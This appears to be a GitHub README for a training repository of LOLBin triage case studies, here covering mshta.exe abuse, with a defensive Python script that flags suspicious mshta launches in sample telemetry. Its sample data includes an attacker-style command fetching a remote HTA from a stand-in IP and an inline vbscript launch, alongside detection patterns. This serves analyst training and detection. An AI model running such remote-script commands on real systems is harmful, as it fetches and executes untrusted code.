Living Off the Land Binary (LOLBin) Triage Case Studies for Cybersecurity Analysis
This repository documents real-world forensic triage cases involving the abuse of legitimate Windows binaries—also known as LOLBins—for malicious purposes. Each case study follows a structured, professional-grade methodology aligned with incident response workflows and exam objectives from the CompTIA CySA+ certification.
- Provide technically rigorous, attacker-centric IOC case studies
- Train cybersecurity analysts to recognize LOLBin abuse patterns
- Demonstrate structured triage workflows using real telemetry sources
- Build a reusable reference system for host-based and network-based investigations
Each case follows a consistent structure:
- Technical Definition
- Source of IOC (Telemetry Origin)
- Triage Framework Declaration
- Standard Investigative Toolkit (Ordered and Layered)
- Host OS Layer Mapping
- Cross-Layer Interaction Pivots
- OSI Layer Relevance
- Attacker Behavior Interpretation
- Defender Action Summary
- Attacker Strategy Notes
- IOC #11 – mshta.exe Execution (Unexpected HTA Launch)
  Abuse of a trusted Windows binary to launch remote or inline scripts for initial access and persistence.
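As an added illustration of the telemetry-driven triage this case describes (example code written for this README, not one of the repository's case-study files), the following Python helper scans constructed Sysmon-style process-creation records for mshta.exe launches and flags the patterns named above: remote script sources, inline script protocol handlers, and unexpected parent processes. The record field names, sample values and the parent-process lists are assumptions.

```python
import re

# Constructed Sysmon Event ID 1-style records (image, parent image, command line); not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Program Files\Vendor\app.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r"mshta.exe http://203.0.113.10/update.hta"},
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'mshta.exe vbscript:msgbox("test")'},
    {"image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe"},
]

REMOTE_RE = re.compile(r"\b(?:https?|ftp)://", re.I)        # script body fetched off-host
INLINE_RE = re.compile(r"\b(?:javascript|vbscript):", re.I)  # inline script, no .hta file on disk
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}  # assumed watch list
SHELL_PARENTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}   # assumed watch list


def triage_mshta(event):
    """Return triage findings for one process-creation event (empty list = nothing notable)."""
    if not event["image"].lower().endswith("\\mshta.exe"):
        return []
    cmd = event["cmdline"]
    parent = event["parent"].lower().rsplit("\\", 1)[-1]  # parent image basename
    findings = []
    if REMOTE_RE.search(cmd):
        findings.append("remote HTA/script fetched over the network")
    if INLINE_RE.search(cmd):
        findings.append("inline script passed via protocol handler")
    if parent in OFFICE_PARENTS:
        findings.append(f"spawned by Office process {parent} (document-borne pattern)")
    elif parent in SHELL_PARENTS:
        findings.append(f"spawned by shell/script host {parent}")
    if not findings and not re.search(r"\.hta\b", cmd, re.I):
        findings.append("mshta launched without a local .hta argument")
    return findings


def triage_events(events):
    """Host-layer pivot: map each flagged command line to its findings, in telemetry order."""
    flagged = {}
    for event in events:
        findings = triage_mshta(event)
        if findings:
            flagged[event["cmdline"]] = findings
    return flagged
```

Calling `triage_events(SAMPLE_EVENTS)` flags the Office-spawned remote launch and the inline script from cmd.exe, while the vendor application opening its own local .hta passes clean.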
More case studies will be added regularly.
Steven Tuschman
GitHub: CompCode1
Engineered Cybersecurity Architecture | Triage Systems | IOC Pattern Recognition
This project is licensed under the MIT License.